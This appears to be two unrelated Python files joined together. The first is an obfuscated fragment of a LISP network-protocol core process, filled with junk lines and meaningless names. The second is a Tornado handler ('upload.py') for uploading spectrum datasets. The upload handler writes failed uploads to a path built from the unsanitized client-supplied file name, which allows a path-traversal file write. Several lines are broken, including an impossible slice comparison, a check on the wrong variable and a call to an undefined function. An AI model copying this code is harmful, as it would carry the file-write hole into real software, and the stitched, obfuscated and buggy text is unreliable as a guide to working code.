if ( O0Oo0O00o0oo0OO ( None , 0 , ii11Ii1IiiI1 . nonce ) ) :
OO0o0o0oo ( lisp_sockets , oOOo0 , oo00O00oO , OOoOoO )
continue
if 16 - 16: iIii1I11I1II1 * iII111i + oO0o . O0 . o0oOOo0O0Ooo
if 99 - 99: i11iIiiIii - iII111i
if 85 - 85: I1Ii111 % I1ii11iIi11i
if 95 - 95: OoO0O00 * OOooOOo * iII111i . o0oOOo0O0Ooo
if 73 - 73: OoO0O00
if 28 - 28: OoooooooOO - I11i
if 84 - 84: II111iiii
if 36 - 36: OOooOOo - OoOoOO00 - iIii1I11I1II1
if ( oO0ooOOO . type == lisp . LISP_MAP_NOTIFY and oOOo0 == "lisp-etr" ) :
O0ooo0O0oo0 = lisp . lisp_packet_ipc ( OOoOoO , oOOo0 , oo00O00oO )
lisp . lisp_ipc ( O0ooo0O0oo0 , Ooo , "lisp-itr" )
continue
if 10 - 10: I1ii11iIi11i / Ii1I * i1IIi % O0 + I11i
if 25 - 25: I1Ii111 - Ii1I / O0 . OoooooooOO % I1IiiI . i1IIi
if 19 - 19: II111iiii / II111iiii % I1ii11iIi11i + oO0o + oO0o + iII111i
if 4 - 4: o0oOOo0O0Ooo + I11i / iII111i + i1IIi % o0oOOo0O0Ooo % iII111i
if 80 - 80: Ii1I
if 26 - 26: iIii1I11I1II1 . OoooooooOO - iIii1I11I1II1
if 59 - 59: I1ii11iIi11i + I11i . oO0o
IIIIIiI11Ii = lisp . lisp_convert_4to6 ( O0o0O0O0O )
IIIIIiI11Ii = lisp . lisp_address ( lisp . LISP_AFI_IPV6 , "" , 128 , 0 )
if ( IIIIIiI11Ii . is_ipv4_string ( O0o0O0O0O ) ) : O0o0O0O0O = "::ffff:" + O0o0O0O0O
IIIIIiI11Ii . store_address ( O0o0O0O0O )
if 87 - 87: OoO0O00
if 34 - 34: I1Ii111 . OoOoOO00 / i11iIiiIii / iII111i
if 46 - 46: Oo0Ooo + II111iiii * I1IiiI + OOooOOo
if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
lisp . lisp_send ( lisp_sockets , IIIIIiI11Ii , oo00O00oO , OOoOoO )
if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
return
if 46 - 46: i11iIiiIii
if 15 - 15: O0 / i1IIi / i1IIi . iII111i % OoOoOO00 + I1IiiI
if 48 - 48: I1Ii111 % iII111i % Ii1I % iIii1I11I1II1 . Ii1I
if 14 - 14: iII111i * OoO0O00 % O0 + I11i + I1ii11iIi11i
if 23 - 23: Oo0Ooo % iII111i + Ii1I - I1Ii111
if 65 - 65: OoooooooOO
if 22 - 22: OOooOOo + II111iiii + Oo0Ooo
if 83 - 83: ooOoO0o
def O0O0oOOo0O ( ) :
Oo = open ( "./lisp.config.example" , "r" ) ; O0OOOOo0O = Oo . read ( ) ; Oo . close ( )
Oo = open ( "./lisp.config" , "w" )
O0OOOOo0O = O0OOOOo0O . split ( "\n" )
for OOoO in O0OOOOo0O :
Oo . write ( OOoO + "\n" )
if ( OOoO [ 0 ] == "#" and OOoO [ - 1 ] == "#" and len ( OOoO ) >= 4 ) :
i1Ii1i11ii = OOoO [ 1 : - 2 ]
oO0O0oo = len ( i1Ii1i11ii ) * "-"
if ( i1Ii1i11ii == oO0O0oo ) : break
if 64 - 64: OoOoOO00 % OoOoOO00 + o0oOOo0O0Ooo + Oo0Ooo
if 79 - 79: Oo0Ooo - OoooooooOO % I1Ii111 + OoooooooOO - I11i % OoOoOO00
Oo . close ( )
return
if 5 - 5: OoOoOO00 . Oo0Ooo
if 89 - 89: I1IiiI / iII111i / OoooooooOO - i11iIiiIii + I1IiiI
if 64 - 64: i11iIiiIii + i1IIi % O0 . I11i
if 64 - 64: ooOoO0o / i1IIi % iII111i
if 84 - 84: OoOoOO00 - Oo0Ooo . ooOoO0o . IiII - Oo0Ooo
if 99 - 99: I1Ii111
if 75 - 75: ooOoO0o . OOooOOo / IiII
if 84 - 84: OoooooooOO . I1IiiI / o0oOOo0O0Ooo
def oOO0O00o0O0 ( bottle_port ) :
global o0oO0
global I1Ii11I1Ii1i
global Ooo
global o0oOoO00o
global i1
global oOOoo00O0O
if 68 - 68: i11iIiiIii + OoO0O00
lisp . lisp_i_am ( "core" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "core-process starting up" )
lisp . lisp_uptime = lisp . lisp_get_timestamp ( )
lisp . lisp_version = getoutput ( "cat lisp-version.txt" )
o0oO0 = getoutput ( "cat lisp-build-date.txt" )
if 13 - 13: ooOoO0o - I1IiiI
if 23 - 23: I1IiiI
if 7 - 7: iII111i % I1ii11iIi11i
if 64 - 64: I1Ii111 + i11iIiiIii
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 35 - 35: OoOoOO00 + i1IIi % OOooOOo
if 68 - 68: IiII . ooOoO0o
if 64 - 64: i1IIi + Oo0Ooo * I1IiiI / OOooOOo
if 3 - 3: Oo0Ooo / ooOoO0o + ooOoO0o . I1ii11iIi11i
if 50 - 50: iIii1I11I1II1 * oO0o
lisp . lisp_ipc_lock = multiprocessing . Lock ( )
if 85 - 85: i1IIi
if 100 - 100: OoooooooOO / I11i % OoO0O00 + Ii1I
if 42 - 42: Oo0Ooo / IiII . Ii1I * I1IiiI
if 54 - 54: OoOoOO00 * iII111i + OoO0O00
if 93 - 93: o0oOOo0O0Ooo / I1IiiI
if 47 - 47: Oo0Ooo * OOooOOo
if 98 - 98: oO0o - oO0o . ooOoO0o
if ( os . path . exists ( "lisp.py" ) ) : lisp . lisp_version += "+"
if 60 - 60: I1IiiI * I1ii11iIi11i / O0 + I11i + IiII
if 66 - 66: IiII * Oo0Ooo . OoooooooOO * I1Ii111
if 93 - 93: IiII / i1IIi
if 47 - 47: ooOoO0o - Ii1I
if 98 - 98: oO0o . I1Ii111 / OoOoOO00 . ooOoO0o
if 1 - 1: OOooOOo
OoOo0o0OOoO0 = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
if ( os . getenv ( "LISP_ANYCAST_MR" ) == None or lisp . lisp_myrlocs [ 0 ] == None ) :
I1Ii11I1Ii1i = lisp . lisp_open_listen_socket ( OoOo0o0OOoO0 ,
str ( lisp . LISP_CTRL_PORT ) )
else :
OoOo0o0OOoO0 = lisp . lisp_myrlocs [ 0 ] . print_address_no_iid ( )
I1Ii11I1Ii1i = lisp . lisp_open_listen_socket ( OoOo0o0OOoO0 ,
str ( lisp . LISP_CTRL_PORT ) )
if 30 - 30: Ii1I % I11i + o0oOOo0O0Ooo
lisp . lprint ( "Listen on {}, port 4342" . format ( OoOo0o0OOoO0 ) )
if 65 - 65: iIii1I11I1II1 . iII111i / Ii1I
if 12 - 12: I1IiiI + I1Ii111
if 80 - 80: oO0o . O0
if 90 - 90: II111iiii / OoO0O00 / Ii1I
if 70 - 70: Ii1I - II111iiii . Oo0Ooo / Oo0Ooo
if 30 - 30: oO0o . OoO0O00 + I11i / iIii1I11I1II1 % Oo0Ooo / oO0o
if ( lisp . lisp_external_data_plane ( ) == False ) :
oOOoo00O0O = lisp . lisp_open_listen_socket ( OoOo0o0OOoO0 ,
str ( lisp . LISP_DATA_PORT ) )
lisp . lprint ( "Listen on {}, port 4341" . format ( OoOo0o0OOoO0 ) )
if 3 - 3: I1ii11iIi11i / II111iiii
if 73 - 73: OoO0O00 * OoooooooOO - OoooooooOO + I1IiiI * Oo0Ooo
if 87 - 87: o0oOOo0O0Ooo / IiII / i11iIiiIii
if 95 - 95: i1IIi / Ii1I / Ii1I
if 65 - 65: I1Ii111 + iII111i * iII111i
if 79 - 79: i1IIi / Oo0Ooo - I1IiiI . O0
Ooo = lisp . lisp_open_send_socket ( "lisp-core" , "" )
Ooo . settimeout ( 3 )
if 56 - 56: IiII % O0 * i1IIi - II111iiii
if 74 - 74: i1IIi - OoOoOO00 % oO0o . O0 - OoooooooOO
if 84 - 84: I1Ii111
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo + I1IiiI % OoooooooOO - iIii1I11I1II1
o0oOoO00o = lisp . lisp_open_listen_socket ( "" , "lisp-core-pkt" )
if 9 - 9: i1IIi - OoOoOO00
i1 = [ I1Ii11I1Ii1i , I1Ii11I1Ii1i ,
Ooo ]
if 57 - 57: iIii1I11I1II1 * Ii1I * iII111i / oO0o
if 46 - 46: Ii1I
if 61 - 61: o0oOOo0O0Ooo / ooOoO0o - II111iiii
if 87 - 87: I1ii11iIi11i / I1IiiI
if 45 - 45: OoOoOO00 * ooOoO0o / OoooooooOO + OoO0O00 . I1Ii111 / OoO0O00
threading . Thread ( target = o0OoOo0O00 ,
args = [ o0oOoO00o , i1 ] ) . start ( )
if 64 - 64: Ii1I / i1IIi % I1IiiI - o0oOOo0O0Ooo
if 11 - 11: I1ii11iIi11i - OoooooooOO
if 16 - 16: IiII % OoooooooOO - ooOoO0o * Ii1I - Ii1I
if 27 - 27: IiII + iIii1I11I1II1 / Oo0Ooo + OoO0O00 % Oo0Ooo + OoO0O00
if 77 - 77: Oo0Ooo * ooOoO0o % Ii1I
if 2 - 2: I11i / Oo0Ooo / Ii1I / I1ii11iIi11i / OoooooooOO
if ( os . path . exists ( "./lisp.config" ) == False ) :
lisp . lprint ( ( "./lisp.config does not exist, creating a copy " + "from lisp.config.example" ) )
if 22 - 22: iIii1I11I1II1 * I1IiiI / I11i + OoOoOO00
O0O0oOOo0O ( )
if 98 - 98: OOooOOo
if 69 - 69: II111iiii + Oo0Ooo - oO0o . Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1
if 75 - 75: OoO0O00 % OoooooooOO
if 16 - 16: O0 / i1IIi
if 58 - 58: o0oOOo0O0Ooo / i11iIiiIii / O0 % I11i % I1IiiI
if 86 - 86: IiII + OoOoOO00 / I1IiiI + I11i % I11i / i11iIiiIii
iIiI1I ( I1Ii11I1Ii1i )
if 2 - 2: o0oOOo0O0Ooo . Ii1I % OoOoOO00
threading . Thread ( target = lispconfig . lisp_config_process ,
args = [ Ooo ] ) . start ( )
if 58 - 58: I1ii11iIi11i % Ii1I * Ii1I - iII111i
if 9 - 9: ooOoO0o - Ii1I % II111iiii + IiII + OOooOOo % O0
if 65 - 65: OOooOOo - OoO0O00 % i11iIiiIii
if 58 - 58: iII111i
threading . Thread ( target = ooO ,
args = [ bottle_port ] ) . start ( )
threading . Thread ( target = oOO0O0O0OO00oo , args = [ ] ) . start ( )
if 2 - 2: II111iiii + i1IIi
if 68 - 68: OOooOOo + Ii1I
if 58 - 58: IiII * Ii1I . i1IIi
if 19 - 19: oO0o
threading . Thread ( target = IiI1I1IIIi1i ,
args = [ Ooo ] ) . start ( )
if 85 - 85: ooOoO0o - I1IiiI / i1IIi / OoO0O00 / II111iiii
if 94 - 94: iIii1I11I1II1 + IiII
if 44 - 44: OoO0O00 + I11i % OoO0O00 + i1IIi + iII111i + O0
if 18 - 18: iIii1I11I1II1 % iIii1I11I1II1 % oO0o + I1IiiI % ooOoO0o / Ii1I
threading . Thread ( target = iI1I1ii11IIi1 ) . start ( )
return ( True )
if 36 - 36: OoOoOO00 . i11iIiiIii
if 81 - 81: Oo0Ooo * iII111i * OoO0O00
if 85 - 85: O0 * oO0o
if 39 - 39: II111iiii * I1IiiI - iIii1I11I1II1
if 25 - 25: OoooooooOO . Ii1I % iII111i . IiII
if 67 - 67: OoooooooOO + I1Ii111 / ooOoO0o
if 75 - 75: IiII / OoooooooOO . I1IiiI + I1Ii111 - II111iiii
def I1i11 ( ) :
if 5 - 5: o0oOOo0O0Ooo - i11iIiiIii . IiII
if 10 - 10: OoOoOO00 . IiII * iIii1I11I1II1 - oO0o - OoOoOO00 / I1Ii111
if 13 - 13: oO0o + OoOoOO00 % IiII % OoooooooOO
if 22 - 22: I1Ii111
lisp . lisp_close_socket ( Ooo , "lisp-core" )
lisp . lisp_close_socket ( o0oOoO00o , "lisp-core-pkt" )
lisp . lisp_close_socket ( I1Ii11I1Ii1i , "" )
lisp . lisp_close_socket ( oOOoo00O0O , "" )
return
if 23 - 23: O0
if 41 - 41: i1IIi . OOooOOo / ooOoO0o / o0oOOo0O0Ooo % IiII - Ii1I
if 14 - 14: I1ii11iIi11i - i11iIiiIii * I1Ii111
if 39 - 39: OoooooooOO
if 19 - 19: i11iIiiIii
if 80 - 80: I1IiiI
if 58 - 58: oO0o + I1ii11iIi11i % OoOoOO00
if 22 - 22: iIii1I11I1II1 - Ii1I / I1IiiI * IiII
if 26 - 26: o0oOOo0O0Ooo + OOooOOo - o0oOOo0O0Ooo + Oo0Ooo . oO0o
if 97 - 97: i1IIi
if 46 - 46: I1ii11iIi11i
if 30 - 30: OoO0O00 / O0 * o0oOOo0O0Ooo * I1Ii111 + OoooooooOO * iII111i
def iIiI1I ( lisp_socket ) :
if 23 - 23: I11i
Oo = open ( "./lisp.config" , "r" ) ; O0OOOOo0O = Oo . read ( ) ; Oo . close ( )
O0OOOOo0O = O0OOOOo0O . split ( "\n" )
if 36 - 36: IiII . iII111i - i1IIi + I1Ii111
if 54 - 54: OoooooooOO . oO0o - iII111i
if 76 - 76: I1Ii111
if 61 - 61: ooOoO0o / II111iiii * ooOoO0o * OoOoOO00 * I1Ii111 . i11iIiiIii
if 26 - 26: I1Ii111 / ooOoO0o - OoO0O00 . iIii1I11I1II1
O0o0OOo0o0o = False
for OOoO in O0OOOOo0O :
if ( OOoO [ 0 : 1 ] == "#-" and OOoO [ - 2 : - 1 ] == "-#" ) : break
if ( OOoO == "" or OOoO [ 0 ] == "#" ) : continue
if ( OOoO . find ( "decentralized-push-xtr = yes" ) == - 1 ) : continue
O0o0OOo0o0o = True
break
if 90 - 90: I11i
if ( O0o0OOo0o0o == False ) : return
if 95 - 95: OoO0O00
if 68 - 68: iIii1I11I1II1 . iIii1I11I1II1 / OoOoOO00 - II111iiii - iIii1I11I1II1
if 75 - 75: ooOoO0o . I1IiiI * II111iiii
if 99 - 99: iIii1I11I1II1 * I1ii11iIi11i + IiII
if 70 - 70: i1IIi % ooOoO0o . I1ii11iIi11i - IiII + OOooOOo
OO0o0oo = [ ]
o0oo0oOOOo00 = False
for OOoO in O0OOOOo0O :
if ( OOoO [ 0 : 1 ] == "#-" and OOoO [ - 2 : - 1 ] == "-#" ) : break
if ( OOoO == "" or OOoO [ 0 ] == "#" ) : continue
if 57 - 57: o0oOOo0O0Ooo + Oo0Ooo * I1ii11iIi11i - ooOoO0o % iIii1I11I1II1 - Ii1I
if ( OOoO . find ( "lisp map-server" ) != - 1 ) :
o0oo0oOOOo00 = True
continue
if 37 - 37: OoO0O00 * I11i + Ii1I + I1ii11iIi11i * o0oOOo0O0Ooo
if ( OOoO [ 0 ] == "}" ) :
o0oo0oOOOo00 = False
continue
if 95 - 95: Ii1I - i11iIiiIii % i11iIiiIii - O0 * I1Ii111
if 81 - 81: II111iiii * I1IiiI % i1IIi * i11iIiiIii + OoOoOO00
if 100 - 100: i1IIi % Ii1I
if 55 - 55: I1IiiI + iII111i
if 85 - 85: oO0o + iII111i % iII111i / I11i . I1IiiI - OoOoOO00
if ( o0oo0oOOOo00 and OOoO . find ( "address = " ) != - 1 ) :
i1I11 = OOoO . split ( "address = " ) [ 1 ]
OoO00 = int ( i1I11 . split ( "." ) [ 0 ] )
if ( OoO00 >= 224 and OoO00 < 240 ) : OO0o0oo . append ( i1I11 )
if 57 - 57: Oo0Ooo - OoooooooOO % I1ii11iIi11i . OoO0O00 * II111iiii
if 72 - 72: I1Ii111 + ooOoO0o . IiII % II111iiii
if ( i1I11 == [ ] ) : return
if 58 - 58: ooOoO0o
if 45 - 45: o0oOOo0O0Ooo
if 67 - 67: iII111i + ooOoO0o
if 25 - 25: i1IIi - i11iIiiIii
Ii1IIi = getoutput ( 'ifconfig eth0 | egrep "inet "' )
if ( Ii1IIi == "" ) : return
i1IIII1II = Ii1IIi . split ( ) [ 1 ]
if 89 - 89: I11i % iII111i * Oo0Ooo / I1Ii111 * Oo0Ooo / ooOoO0o
if 14 - 14: i1IIi * iIii1I11I1II1 - Ii1I * OoOoOO00 - iII111i / oO0o
if 73 - 73: I1ii11iIi11i - OoOoOO00 * O0 - OoOoOO00 - OoO0O00
if 96 - 96: I1ii11iIi11i - O0
Ii111iIi1iIi = socket . inet_aton ( i1IIII1II )
for i1I11 in OO0o0oo :
lisp_socket . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 )
lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_MULTICAST_IF , Ii111iIi1iIi )
I1iO00O000oOO0oO = socket . inet_aton ( i1I11 ) + Ii111iIi1iIi
lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_ADD_MEMBERSHIP , I1iO00O000oOO0oO )
lisp . lprint ( "Setting multicast listen socket for group {}" . format ( i1I11 ) )
if 88 - 88: o0oOOo0O0Ooo . I1IiiI % oO0o . Oo0Ooo % ooOoO0o . oO0o
if 53 - 53: i1IIi % Ii1I - OoooooooOO / OoOoOO00 - iIii1I11I1II1
return
if 9 - 9: I1Ii111 - OoO0O00 + iIii1I11I1II1 % O0 + I11i + IiII
if 50 - 50: i1IIi + ooOoO0o
if 64 - 64: o0oOOo0O0Ooo % oO0o . ooOoO0o
if 6 - 6: ooOoO0o / i11iIiiIii - Oo0Ooo
I11iIiiI = int ( sys . argv [ 1 ] ) if ( len ( sys . argv ) > 1 ) else 8080
if 88 - 88: I1ii11iIi11i - I11i * OoooooooOO * iII111i . i11iIiiIii . o0oOOo0O0Ooo
if 96 - 96: I1IiiI % I1IiiI / o0oOOo0O0Ooo / OoOoOO00 * ooOoO0o - I1Ii111
if 94 - 94: Oo0Ooo - iIii1I11I1II1 + I1IiiI - i1IIi + OoooooooOO % OoO0O00
if 36 - 36: iII111i * I11i * O0 * OOooOOo - o0oOOo0O0Ooo / I1ii11iIi11i
if ( oOO0O00o0O0 ( I11iIiiI ) == False ) :
lisp . lprint ( "lisp_core_startup() failed" )
lisp . lisp_print_banner ( "lisp-core abnormal exit" )
exit ( 1 )
if 54 - 54: i1IIi - OoO0O00 / OoooooooOO
if 95 - 95: O0 + iIii1I11I1II1 . I1ii11iIi11i
while ( True ) :
if 61 - 61: Ii1I * Ii1I
if 70 - 70: I1Ii111 . I1ii11iIi11i / o0oOOo0O0Ooo * oO0o
if 74 - 74: I1IiiI . ooOoO0o / iII111i . IiII
if 74 - 74: Oo0Ooo / I1Ii111 % I1Ii111 . IiII
if 72 - 72: i1IIi
III1iII1I1ii , oOOo0 , oo00O00oO , OOoOoO = lisp . lisp_receive ( I1Ii11I1Ii1i , False )
if 21 - 21: I1Ii111 . OOooOOo / i11iIiiIii * i1IIi
if ( oOOo0 == "" ) : break
if 82 - 82: ooOoO0o * Oo0Ooo % i11iIiiIii * i1IIi . OOooOOo
if 89 - 89: IiII - i1IIi - IiII
if 74 - 74: OoO0O00 % OoO0O00
if 28 - 28: OoOoOO00 % oO0o - OOooOOo + OOooOOo + oO0o / iIii1I11I1II1
oOOo0 = lisp . lisp_convert_6to4 ( oOOo0 )
OO0o0o0oo ( i1 , oOOo0 , oo00O00oO , OOoOoO )
if 91 - 91: I1IiiI / II111iiii * OOooOOo
if 94 - 94: II111iiii - iIii1I11I1II1 - iIii1I11I1II1
I1i11 ( )
lisp . lisp_print_banner ( "lisp-core normal exit" )
exit ( 0 )
if 83 - 83: I1ii11iIi11i * iIii1I11I1II1 + OoOoOO00 * i1IIi . OoooooooOO % Ii1I
if 81 - 81: OoO0O00 - iIii1I11I1II1
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
upload.py | from __future__ import absolute_import, print_function, division
import h5py
import logging
import numpy as np
import os
import pandas as pd
import re
import time
import yaml
from io import BytesIO, StringIO
from six.moves import xrange
from superman.file_io import parse_spectrum
from threading import Thread
from tornado import gen
from tornado.escape import url_escape
from zipfile import is_zipfile, ZipFile
from .common import BaseHandler
from ..web_datasets import (
UploadedSpectrumDataset,
WebTrajDataset, WebVectorDataset, WebLIBSDataset, DATASETS,
PrimaryKeyMetadata, NumericMetadata, BooleanMetadata, LookupMetadata)
from six.moves import map
from six.moves import range
# This hack is required to work around a strange bug in superman.file_io
# where pandas.read_excel will call .close() on the file object, even if
# parsing as an excel file fails.
class UncloseableBytesIO(BytesIO):
"""Wraps BytesIO and prevents the file from being closed."""
def close(self):
pass
class SpectrumUploadHandler(BaseHandler):
def post(self):
fig_data = self.get_fig_data()
if fig_data is None:
return self.visible_error(403, 'Broken connection to server.')
if not self.request.files:
return self.visible_error(403, 'No file uploaded.')
f = self.request.files['query'][0]
fname = f['filename']
logging.info('Parsing file: %s', fname)
fh = UncloseableBytesIO(f['body'])
try:
query = parse_spectrum(fh)
except Exception:
try:
fh = StringIO(f['body'].decode(
'utf-8', 'ignore'), newline=None)
query = parse_spectrum(fh)
except Exception:
logging.exception('Spectrum parse failed.')
# XXX: save failed uploads for debugging purposes
open('logs/badupload-' + fname, 'w').write(f['body'])
return self.visible_error(415, 'Spectrum upload failed.')
ds = UploadedSpectrumDataset(fname, query)
fig_data.set_selected(ds.view(), title=fname)
axlimits = fig_data.plot()
return self.write_json(axlimits)
class DatasetUploadHandler(BaseHandler):
@gen.coroutine
def post(self):
ds_name = self.get_argument('ds_name')
ds_kind = self.get_argument('ds_kind')
description = self.get_argument('desc')
resample = (self.get_argument('lb', ''), self.get_argument('ub', ''),
self.get_argument('step', ''))
if not any(resample):
resample = None
if ds_kind not in DATASETS:
self.visible_error(
400,
'Invalid dataset kind.',
'Invalid ds_kind: %r',
ds_kind)
return
if ds_name in DATASETS[ds_kind]:
self.visible_error(403, 'Dataset already exists.',
'ds import would clobber existing: %s [%s]',
ds_name, ds_kind)
return
if not self.request.files or 'spectra' not in self.request.files:
self.visible_error(400, 'No spectrum data uploaded.')
return
meta_file, = self.request.files.get('metadata', [None])
spectra_file, = self.request.files['spectra']
err = yield gen.Task(_async_ds_upload, meta_file, spectra_file, ds_name,
ds_kind, resample, description)
if err:
self.visible_error(*err)
return
# Return a link to the new dataset to signal the upload succeeded.
self.write('/explorer?ds_kind=%s&ds_name=%s' % (
ds_kind, url_escape(ds_name, plus=False)))
# Kick off a background thread to save this new dataset to disk.
t = Thread(target=_save_ds, args=(ds_kind, ds_name))
t.daemon = True
t.start()
def _async_ds_upload(meta_file, spectra_file, ds_name, ds_kind, resample,
description, callback=None):
def helper():
meta_kwargs, meta_pkeys, err = _load_metadata_csv(meta_file)
if err is None:
fh = BytesIO(spectra_file['body'])
if is_zipfile(fh):
# interpret this as a ZIP of csv files
fh.seek(0)
err = _traj_ds(fh, ds_name, ds_kind, meta_kwargs, meta_pkeys,
resample, description)
else:
# this is one single csv file with all spectra in it
fh.seek(0)
err = _vector_ds(fh, ds_name, ds_kind, meta_kwargs, meta_pkeys,
resample, description)
callback(err)
t = Thread(target=helper)
t.daemon = True
t.start()
def _load_metadata_csv(f=None):
# metadata is optional
if f is None:
return {}, [], None
fh = BytesIO(f['body'])
try:
meta = pd.read_csv(fh)
except Exception:
logging.exception('Bad metadata file')
return None, None, (415, 'Unable to parse metadata CSV.')
if meta.columns[0] != 'pkey':
return None, None, (415, 'Metadata CSV must start with "pkey" column.')
meta_kwargs = {}
for i, name in enumerate(meta.columns[1:]):
x = meta[name].values
if np.issubdtype(x.dtype, np.bool_):
m = BooleanMetadata(x, display_name=name)
elif np.issubdtype(x.dtype, np.number):
m = NumericMetadata(x, display_name=name)
else:
m = LookupMetadata(x, display_name=name)
# use a JS-friendly string key
meta_kwargs['k%d' % i] = m
# make sure there's no whitespace sticking to the pkeys
meta_pkeys = np.array(meta.pkey.values, dtype='U', copy=False)
meta_pkeys = np.char.strip(meta_pkeys)
return meta_kwargs, meta_pkeys, None
def _traj_ds(fh, ds_name, ds_kind, meta_kwargs, meta_pkeys, resample,
description):
# sanity check before doing the hard work
if resample is None and ds_kind == 'LIBS':
return (415, 'Failed: LIBS data must be sampled on a common x-axis')
zf = ZipFile(fh)
traj_data = {}
for subfile in zf.infolist():
if subfile.file_size <= 0:
continue
# ignore directory prefixes
fname = os.path.basename(subfile.filename)
# ignore hidden files
if fname.startswith('.'):
continue
# read and wrap, because the ZipExtFile object isn't seekable
sub_fh = UncloseableBytesIO(zf.open(subfile).read())
try:
# TODO: ensure each traj has wavelengths in increasing order
traj_data[fname] = parse_spectrum(sub_fh)
except Exception:
logging.exception('bad spectrum subfile: ' + fname)
return (415, 'Unable to parse spectrum file: %s' % fname)
num_meta = len(meta_pkeys)
num_traj = len(traj_data)
if num_meta == 0:
meta_pkeys = list(traj_data.keys())
elif num_meta != num_traj:
return (415, 'Failed: %d metadata entries for %d spectra' % (num_meta,
num_traj))
else:
for pkey in meta_pkeys:
if pkey not in traj_data:
return (415, 'Failed: %r not in spectra.' % pkey)
if resample is None:
_load = _make_loader_function(description, meta_pkeys, traj_data,
**meta_kwargs)
WebTrajDataset(ds_name, ds_kind, _load)
else:
lb, ub, step = list(map(_maybe_float, resample))
waves = [t[:, 0] for t in traj_data.values()]
if lb is None:
lb = max(w[0] for w in waves)
if ub is None:
ub = min(w[-1] for w in waves)
if step is None:
step = min(np.diff(w).min() for w in waves)
wave = np.arange(lb, ub + step / 2, step, dtype=waves[0].dtype)
spectra = np.zeros((len(waves), len(wave)), dtype=wave.dtype)
for i, key in enumerate(meta_pkeys):
traj = traj_data[key]
spectra[i] = np.interp(wave, traj[:, 0], traj[:, 1])
pkey = PrimaryKeyMetadata(meta_pkeys)
_load = _make_loader_function(description, wave, spectra, pkey=pkey,
**meta_kwargs)
WebVectorDataset(ds_name, ds_kind, _load)
return None
def _vector_ds(fh, ds_name, ds_kind, meta_kwargs, meta_pkeys, resample,
description):
try:
pkey = np.array(next(fh).strip().split(b',')[1:])
data = np.genfromtxt(fh, dtype=np.float32, delimiter=b',', unpack=True)
wave = data[0]
spectra = data[1:]
except Exception:
logging.exception('Bad spectra file.')
return visible_error(415, 'Unable to parse spectrum data CSV.')
# cut out empty columns (where pkey is '')
mask = pkey != b''
if not mask.all():
pkey = pkey[mask]
spectra = spectra[mask]
# cut out empty rows (where wave is NaN)
mask = np.isfinite(wave)
if not mask.all():
wave = wave[mask]
spectra = spectra[:, mask]
if ds_kind == 'LIBS' and wave.shape[0] not in (6144, 6143, 5485):
logging.info('wave.shape[0]: {}'.format(wave.shape[0]))
# make sure there's no whitespace sticking to the pkeys
pkey = np.char.strip(pkey).astype(str, copy=False)
if len(meta_pkeys) > 0 and not np.array_equal(meta_pkeys, pkey):
if len(meta_pkeys) != len(pkey):
return (415, 'Spectrum and metadata names mismatch.',
'wrong number of meta_pkeys for vector data')
meta_order = np.argsort(meta_pkeys)
data_order = np.argsort(pkey)
if not np.array_equal(meta_pkeys[meta_order], pkey[data_order]):
return (415, 'Spectrum and metadata names mismatch.')
# convert data to meta order
order = data_order[meta_order]
data = data[order]
assert np.array_equal(meta_pkeys, pkey[order])
try:
pkey = PrimaryKeyMetadata(pkey)
except AssertionError: # XXX: convert this to a real error
return (415, 'Primary keys not unique.')
# make sure wave is in increasing order
order = np.argsort(wave)
if not np.array_equal(order, np.arange(len(wave))):
wave = wave[order]
spectra = spectra[:, order]
if resample is not None:
lb, ub, step = resample
lb = _maybe_float(lb, wave[0])
ub = _maybe_float(ub, wave[-1])
step = _maybe_float(step)
if step is not None:
new_wave = np.arange(lb, ub + step / 2, step, dtype=wave.dtype)
new_spectra = np.zeros((len(spectra), len(new_wave)),
dtype=spectra.dtype)
for i, y in enumerate(spectra):
new_spectra[i] = np.interp(new_wave, wave, y)
wave = new_wave
spectra = new_spectra
else:
lb_idx = np.searchsorted(wave, lb)
ub_idx = np.searchsorted(wave, ub, side='right')
spectra = spectra[:, lb_idx:ub_idx]
wave = wave[lb_idx:ub_idx]
# async loading machinery automatically registers us with DATASETS
_load = _make_loader_function(description, wave, spectra, pkey=pkey,
**meta_kwargs)
if ds_kind == 'LIBS':
WebLIBSDataset(ds_name, _load)
else:
WebVectorDataset(ds_name, ds_kind, _load)
return None
def _maybe_float(x, default=None):
try:
return float(x)
except ValueError:
return default
def _make_loader_function(desc, *args, **kwargs):
def _load(ds):
ds.set_data(*args, **kwargs)
ds.is_public = False
ds.user_added = True
ds.description = desc
return True
return _load
def _hdf5_filename(ds_kind, ds_name):
safe_name = re.sub(r'(?u)[^-\w.]', '_', ds_name)
return '%s_%s.hdf5' % (ds_kind, safe_name)
def _save_ds(ds_kind, ds_name):
# Wait for the new dataset to finish registering.
time.sleep(1)
for _ in range(60):
if ds_name in DATASETS[ds_kind]:
break
logging.info('Waiting for %s [%s] to register...', ds_name, ds_kind)
time.sleep(1)
# Save the new dataset to disk as a canonical hdf5.
ds = DATASETS[ds_kind][ds_name]
# XXX: this path manipulation is pretty hacky
outdir = os.path.normpath(os.path.join(os.path.dirname(__file__),
'../../uploads'))
outname = os.path.join(outdir, _hdf5_filename(ds_kind, ds_name))
logging.info('Writing %s to disk: %s', ds, outname)
# Set up the config entry.
entry = dict(
vector=(not isinstance(ds, WebTrajDataset)),
file=os.path.abspath(outname),
description=ds.description,
public=ds.is_public,
metadata=[])
# TODO: move this logic to superman.dataset
with h5py.File(outname, 'w') as fh:
if entry['vector']:
fh['/spectra'] = ds.intensities
fh['/meta/waves'] = ds.bands
else:
for key, traj in ds.traj.items():
fh['/spectra/' + key] = traj
if ds.pkey is not None:
fh['/meta/pkey'] = np.char.encode(ds.pkey.keys, 'utf8')
entry['metadata'].append(('pkey', 'PrimaryKeyMetadata', None))
for key, m in ds.metadata.items():
try:
arr = np.array(m.get_array())
except BaseException:
logging.exception(
'Failed to get_array for %s /meta/%s', ds, key)
continue
if arr.dtype.char == 'U':
